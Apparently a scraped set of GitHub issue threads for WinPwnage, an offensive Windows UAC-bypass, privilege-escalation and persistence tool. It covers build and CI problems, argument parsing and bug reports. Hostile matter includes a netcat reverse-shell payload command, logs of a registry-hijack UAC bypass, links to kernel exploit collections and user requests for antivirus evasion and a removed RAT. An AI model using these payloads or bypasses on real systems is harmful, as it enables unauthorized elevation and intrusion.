rootm0s / winpwnage
UAC bypass, Elevate, Persistence methods
This is a task from #19. Can you please try this out locally and tune it to your preferences?
Once it is the right stuff, we can add it into #41.
usage: argparse_hack.py [-h]
                        {scan,use} {uac,persist,elevate,execute}
                        [function_number] [target]

positional arguments:
  {scan,use}            'scan' shows information and 'use' applies a function
  {uac,persist,elevate,execute}
  function_number       'use' only: function ID in the function group
  target                'use' only: filepath to the target

optional arguments:
  -h, --help            show this help message and exit
#!/usr/bin/env python3
import argparse


def parse_the_args():
    scan_or_use = ("scan", "use")
    choices = "uac persist elevate execute".split()
    parser = argparse.ArgumentParser()
    parser.add_argument("scan_or_use", choices=scan_or_use,
                        help="'scan' shows information and 'use' applies a function")
    parser.add_argument("function_group", choices=choices)
    parser.add_argument("function_number", default=0, type=int, nargs="?",
                        help="'use' only: function ID in the function group")
    # Default target path (the original was missing the backslash after the drive letter)
    parser.add_argument("target", default="C:\\windows\\system32\\cmd.exe", nargs="?",
                        help="'use' only: filepath to the target")
    print("=" * 10)
    parser.print_help()
    print("=" * 10)
    # Exercise every verb/group combination with function number 1
    for verb in scan_or_use:
        for choice in choices:
            print(verb, choice, 1)
            print(parser.parse_args([verb, choice, "1"]))
    # Should exit with error: both positional choices are required
    print(parser.parse_args([]))


if __name__ == '__main__':
    parse_the_args()
Perhaps it would be a good idea to add a command to the end of the .travis.yml file that runs the app.
sc start testserv
sc stop testserv
sc delete testserv
From admin to SYSTEM privilege (non-interactive)
You should first convert the C++ to Python.
Here are some vulnerabilities:
https://github.com/WindowsExploits/Exploits
https://github.com/hfiref0x/CVE-2015-1701
https://github.com/SecWiki/windows-kernel-exploits
I see the code still seems to be on Python 2; correct me if I am wrong.
Thx
Function elevate_mofcomp.py is currently broken.
Sometimes it spawns an elevated process and sometimes it doesn't. The automatic clean-up is also broken at the moment.
Will patch this in near future.
Sometimes WinPwnage quits after successfully executing payload, so it skips the cleaning part.
[!] Attempting to run id (20) configured with payload (['c:\\windows\\system32\\cmd.exe', '/c', 'mspaint.exe'])
[+] Successfully created Default and DelegateExecute key containing payload (c:\windows\system32\cmd.exe /c mspaint.exe )
[!] Disabling file system redirection
[+] Successfully disabled file system redirection
[!] Waiting for wsreset.exe to finish, this can take a few seconds
It exits while it's supposed to wait for it to finish. The payload still gets executed once wsreset.exe is done with all the work.
Seems to happen on different functions as well. Not sure why it happens yet!
So instead of using the CLI, I'm using Python code.
I can successfully bypass a single executable, but I can't bypass two within the same script, which makes me believe (without looking at the code) that there is code telling it to exit, as Python does not normally exit the script without the developer specifically telling it to do so, so I am kind of wondering about this.
This project is awesome, btw! :D
from time import sleep
from winpwnage.functions.uac.uacMethod4 import uacMethod4
f1 = r"C:\Users\nubonix\sandboxie\sandboxie.exe"
f2 = r"C:\Users\nubonix\Desktop\WinPwnage\dist\cli\cli.exe"
uacMethod4([f1])
sleep(30) # after various re-trials of trying to get more than one executable to be bypassed within the same script/program, this was my sanity check
uacMethod4([f2])
Hello and thank you for the useful tool!
I would like to ask for clarification concerning the --payload parameter. The help output indicates it is possible to pass parameters to the payload.
When I do .\winpwnage.exe -u uac -i 3 -p "c:\windows\temp\nc.exe -e powershell.exe 192.168.178.10 3333", I get the error that the payload is invalid. I can guess why, because it tries to find an executable named like the fully quoted string.
But when I do .\winpwnage.exe -u uac -i 3 -p c:\windows\temp\nc.exe -e powershell.exe 192.168.178.10 3333, without the quotes, winpwnage aborts because it tries to interpret the -e option by itself.
How does passing parameters to the payload work in this case? And how is it even possible to distinguish payload parameters from further payloads? (The latter question arises because --payload is defined with nargs="+".)
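The design question in this post (how a CLI can tell a payload's own arguments apart from the tool's options) has two standard answers in argparse: accept the whole payload as one quoted string and split it yourself, or collect everything after a literal "--" verbatim. The following is an added example written for this page, not WinPwnage's own code; the -u/-i/-p option names and the cmd.exe /c mspaint.exe payload are borrowed from this thread purely for illustration.

```python
#!/usr/bin/env python3
"""Added example (not WinPwnage's own code): two ways for a CLI to accept a
payload together with the payload's own arguments without argparse treating
those arguments (for example an "-e") as its own options.

Assumptions: the option names -u/-i/-p mirror the ones used in the question;
the sample payload (taken from the issue log above) is cmd.exe /c mspaint.exe."""
import argparse
import shlex


def build_parser():
    parser = argparse.ArgumentParser(prog="example.py")
    parser.add_argument("-u", "--use", required=True,
                        choices=["uac", "persist", "elevate", "execute"])
    parser.add_argument("-i", "--id", type=int, required=True)
    # Way 1: the whole payload command line as ONE quoted string.
    parser.add_argument("-p", "--payload",
                        help="payload command line as a single quoted string")
    # Way 2: everything after a literal '--' is collected verbatim, so the
    # payload's own flags never reach argparse's option matching.
    parser.add_argument("payload_argv", nargs=argparse.REMAINDER,
                        help="alternative: the payload after '--'")
    return parser


def parse_payload(argv):
    """Return (group, id, payload argv list) or exit with a usage error."""
    parser = build_parser()
    args = parser.parse_args(argv)
    tail = list(args.payload_argv)
    # argparse keeps the '--' separator inside a REMAINDER list; drop it.
    if tail and tail[0] == "--":
        tail = tail[1:]
    if args.payload and tail:
        # e.g. "-p c:\...\cmd.exe /c mspaint.exe" without quotes: the extra
        # words land in the tail, so report the ambiguity instead of guessing.
        parser.error("give the payload either with -p or after '--', not both")
    if tail:
        payload = tail
    elif args.payload:
        # posix=False keeps backslashes in Windows paths intact; with the
        # default posix=True, shlex would treat them as escape characters.
        payload = shlex.split(args.payload, posix=False)
    else:
        parser.error("no payload given")
    return args.use, args.id, payload


if __name__ == "__main__":
    for argv in (
        ["-u", "uac", "-i", "3", "-p",
         r"c:\windows\system32\cmd.exe /c mspaint.exe"],
        ["-u", "uac", "-i", "3", "--",
         r"c:\windows\system32\cmd.exe", "/c", "mspaint.exe"],
    ):
        print(parse_payload(argv))
```

With the first form, the unquoted invocation from the post would still make argparse reject -e as an unknown option, exactly as described; the "--" form sidesteps that entirely, because argparse stops option matching at the separator, and it is the convention most command-line tools follow for "run this other program with these arguments".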
OK, I went through those articles but didn't find any of them helpful. How can someone reproduce this in an environment without Python installed?
How do I make this an exe? I want to still tinker around with the Python code, but how do I turn it into an exe afterwards?
Says it all: Windows Defender is able to stop almost every usable way in Windows 10 1703.
Hi,
Here is another way of bypassing UAC => https://www.activecyber.us/activelabs/windows-uac-bypass
I put it here to remember it; if you don't have time, I will take a look at it, but right now I have no time, sorry :)
Why, when using the schtasks.exe bypass in uac4, can't we elevate with the Windows service in elevate6?
Other UAC bypasses can run elevate6.
On Travis CI Windows environments, running python build.py install raises:
error: bundle-files 1 not yet supported on win64
Is there a way to successfully complete the build process?
Can I ask for some help with modifying something?
Travis CI tests fail with Python 3, help needed!
Issue:
https://travis-ci.com/github/rootm0s/WinPwnage/jobs/306780696
Failures easy.install (exited -1) - Error while running 'C:\ProgramData\chocolatey\lib\easy.install\tools\chocolateyInstall.ps1'. See log for details. The command "choco install pip" failed and exited with 127 during .
Documentation:
https://chocolatey.org/packages/pip#install
I'm trying to convert this project to an exe file with the pyinstaller --onefile winpwnage.py command.
The process completed successfully, but when I execute the exe file in the dist folder nothing happens, and there is no output to the screen.
Is there something more interesting that we could do at the end of the automated test?
We currently just run the four -scan commands, but are there some -use commands as well?
https://github.com/rootm0s/WinPwnage/blob/master/.travis.yml#L84-L88
python winpwnage.py -scan -uac
python winpwnage.py -scan -persist
python winpwnage.py -scan -elevate
python winpwnage.py -scan -execute
Which of these UAC techniques bypass if UAC is set to ALWAYS NOTIFY?
Like in core.winstructures:
class LUID(Structure):
    _fields_ = [('LowPart', DWORD),
                ('HighPart', LONG)]
When [-] is printed, WinPwnage should not exit with 0. This will signal the calling script that a failure has occurred.
[-] Technique not compatible with this system.
The command "$RUN_WINPWNAGE -use -uac 1 /c/windows/system32/cmd.exe" exited with 0.
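One way to get the behaviour this post asks for from the calling side, until the tool itself sets its exit status: a small CI wrapper that runs the command, echoes its output and exits non-zero whenever a line starts with the [-] failure marker. This is an added example written for this page, not WinPwnage code; it assumes the tool marks failures with a leading "[-]" as in the output quoted above.

```python
#!/usr/bin/env python3
"""Added example, not WinPwnage's own code: a wrapper for CI that turns the
tool's "[-]" failure marker into a non-zero exit status, so a calling script
(for example a .travis.yml step) notices a failed technique even when the
tool itself exits with 0."""
import subprocess
import sys

FAILURE_MARKER = "[-]"   # assumption: the tool prefixes failures with "[-]"


def exit_status_for(output_lines):
    """Return 0 if no line reports a failure, otherwise 1.

    Leading whitespace is ignored so indented output still counts."""
    for line in output_lines:
        if line.lstrip().startswith(FAILURE_MARKER):
            return 1
    return 0


def run_checked(argv):
    """Run argv, echo its output, and return (exit status, output lines).

    The status is non-zero if either the process itself failed or any
    output line carries the failure marker."""
    proc = subprocess.run(argv, capture_output=True, text=True)
    lines = proc.stdout.splitlines() + proc.stderr.splitlines()
    for line in lines:
        print(line)
    status = proc.returncode if proc.returncode != 0 else exit_status_for(lines)
    return status, lines


def demo():
    """Constructed sample: two child processes that mimic the tool's output.

    Returns the pair of statuses (a passing run, then a failing run)."""
    ok, _ = run_checked([sys.executable, "-c",
                         "print('[+] Successfully created key')"])
    bad, _ = run_checked([sys.executable, "-c",
                          "print('[-] Technique not compatible with this system.')"])
    return ok, bad


if __name__ == "__main__":
    # Usage: python check_run.py python winpwnage.py -scan -uac
    sys.exit(run_checked(sys.argv[1:])[0])
```

The wrapper keeps the child's own non-zero status when it has one and only falls back to scanning the output when the child reported success, so a genuine crash is never masked by the marker check.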
Elevate from Administrator to SYSTEM using named pipe impersonation is currently broken when using python 3:
Feel free to send a PR if you want to help!
Traceback (most recent call last):
  File "winpwnage.py", line 4, in <module>
    from winpwnage.core.scanner import scanner, function
  File "/home/xubuntu/tools/WinPwnage/winpwnage/core/scanner.py", line 1, in <module>
    from winpwnage.functions.uac.uac_runas import *
  File "/home/xubuntu/tools/WinPwnage/winpwnage/functions/uac/uac_runas.py", line 2, in <module>
    from winpwnage.core.utils import *
  File "/home/xubuntu/tools/WinPwnage/winpwnage/core/utils.py", line 7, in <module>
    import winreg as _winreg
  File "/usr/local/lib/python2.7/dist-packages/winreg/__init__.py", line 6, in <module>
    from _winreg import *
ImportError: No module named _winreg
This tool is detected by antivirus.
How can I encode this tool to avoid detection?
For example, persistMethod4 doesn't support using an exe with params, but persistMethod5 and persistMethod6 support an exe with params.
Hi, could you add the cmstp privesc please?
Hello, many of the UAC elevations are blocked (by Windows Defender), but that's not an issue; the 12th function, however, is really bad. It blocks changing the specific registry key, but other than that leaves it there, resulting in Explorer not working correctly. The registry key gets written with null, and clicking any folder in Explorer now spawns a new empty window.
This is just FYI if anyone has a problem with Explorer after messing with this.
Hi folks, great project, thank you for making this happen.
I would like to potentially use this project as part of my own side project as well, but as it stands, software without a license cannot be copied, reused, modified or distributed legally. If this is intentional, please feel free to close the issue; otherwise, I suggest an open source license such as the MIT License be used.
What are the commands for the persistence and execution techniques?
Can I get CASPER, the socket-based RAT? It's been removed...
The to-do list:
sys.argv[] calls from main.py: use argparse instead (Fixed in: 7de4146)
winpwnage.py in README to main.py
Can we use this module for installation of an app like Notepad++ as admin without a UAC prompt in a standard account? Or can we pass the username and password to install exe apps on a machine silently...
I tried using UAC bypass 4. Initially, it said it could not find the schtasks executable. To fix this, I used os.system instead of the process method you made. Still, all that happens is you see a working cursor. No payload is spawned.
They are all free for Open Source projects like this one.
https://github.com/marketplace/category/continuous-integration
How can I make it so that when I click the exe it opens the command prompt and runs a pre-specified command? Instead of opening cmd and writing "winpwnage.exe --use uac --id 2 --payload start cmd /k whoami", I just click the exe and it does that for me?
After the above cleanup, Windows will have problems in its environment, so some Windows features won't work because they don't have the %windir% value in the environment.
Don't remove the registry value or key.
You should write its real value back to the registry after you have got access this way.
Not just this method; you should apply this fix for all registry methods.